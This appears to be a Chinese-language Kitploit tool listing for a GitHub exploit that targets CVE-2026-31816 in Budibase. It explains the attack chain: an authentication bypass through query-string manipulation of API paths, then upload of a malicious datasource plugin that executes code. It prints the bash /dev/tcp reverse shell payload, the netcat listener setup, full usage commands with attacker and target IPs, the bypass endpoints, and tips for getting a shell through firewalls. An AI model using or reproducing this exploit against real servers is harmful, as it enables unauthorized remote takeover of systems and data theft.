Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-31816-rshell — 利用 Budibase 中的 CVE-2026-31816 绕过身份验证,上传恶意数据源插件,并执行反向 Shell 以实现远程访问。 | Kitploit
工具/GitHubGitHub/imjdl/cve-2026-31816-rshell
漏洞利用Web应用程序漏洞利用身份验证远程访问工具Payload 开发
GitHubimjdl/cve-2026-31816-rshell

CVE-2026-31816-rshell

利用 Budibase 中的 CVE-2026-31816 绕过身份验证,上传恶意数据源插件,并执行反向 Shell 以实现远程访问。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-31816 反向 Shell 漏洞利用工具

概述

该工具利用 CVE-2026-31816 在目标 Budibase 服务器上建立反向 Shell 连接。

攻击链:身份验证绕过 → 上传 DATASOURCE 插件 → 服务端代码执行 → 反向 Shell

环境要求

  • Python 3.6+
  • requests 库(pip install requests)
  • 存在 CVE-2026-31816 漏洞的目标 Budibase 服务器

使用方法

基本步骤

root@kitploit:~
# 1. 在攻击机启动监听器
nc -lvnp 4444

# 2. 运行漏洞利用工具(另一个终端)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444

参数说明

参数是否必需说明
-t, --target✅目标 Budibase URL
--lhost✅监听主机(你的 IP)
--lport❌监听端口(默认:4444)

示例

root@kitploit:~
# 攻击机 IP:192.168.1.100
# 目标 Budibase:192.168.1.128:10000

# 终端 1 - 启动监听器
nc -lvnp 4444

# 终端 2 - 运行漏洞利用工具
python3 CVE-2026-31816-rshell.py \
    -t http://192.168.1.128:10000 \
    --lhost 192.168.1.100 \
    --lport 4444

工作原理

1. 漏洞检测

root@kitploit:~
GET /api/integrations?/webhooks/trigger

如果返回 200,则目标存在身份验证绕过漏洞。

2. 创建恶意插件

root@kitploit:~
{
  "type": "datasource",
  "schema": { ... }
}

DATASOURCE 类型插件会在服务器上执行 JavaScript 代码。

3. 反向 Shell 载荷

root@kitploit:~
// 插件验证时执行:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

4. 上传并执行

root@kitploit:~
POST /api/plugin/upload?/webhooks/trigger

上传插件绕过身份验证。代码在验证过程中执行。

攻击流程

root@kitploit:~
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  攻击机      │     │   目标服务器  │     │  监听器      │
│             │     │             │     │   (nc)      │
│             │     │             │     │             │
│ 漏洞利用 ────┼────►│ 上传插件     │     │             │
│             │     │             │     │             │
│             │     │ 执行代码     │────►│ 监听        │
│             │     │             │◄────┤ 反向连接    │
│             │     │             │     │             │
└─────────────┘     └─────────────┘     └─────────────┘

成功标志

root@kitploit:~
============================================================
CVE-2026-31816 - 反向 Shell 漏洞利用工具
============================================================
[*] 目标:http://192.168.1.128:10000
[*] 反向 Shell:192.168.1.100:4444

[*] 正在检测漏洞...
[+] 目标存在漏洞!
[*] 正在创建针对 192.168.1.100:4444 的反向 Shell 插件

[*] 正在上传反向 Shell 插件...
[*] 状态:200
[+] 插件安装成功!

============================================================
[+] 成功!请检查你的监听器!
============================================================

故障排除

问:连接失败,未收到 Shell

可能原因:

  1. 防火墙阻止了反向连接
  2. 目标服务器无法访问攻击机 IP
  3. 目标服务器缺少 bash

解决方案:

root@kitploit:~
# 检查网络连通性
ping YOUR_IP

# 检查防火墙
sudo ufw allow 4444/tcp

# 尝试其他端口
nc -lvnp 8080

问:上传失败

可能原因:

  1. 目标已修补该漏洞
  2. 网络问题

解决方案:

root@kitploit:~
# 手动测试漏洞是否存在
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# 如果返回 JSON,则漏洞存在
下载工具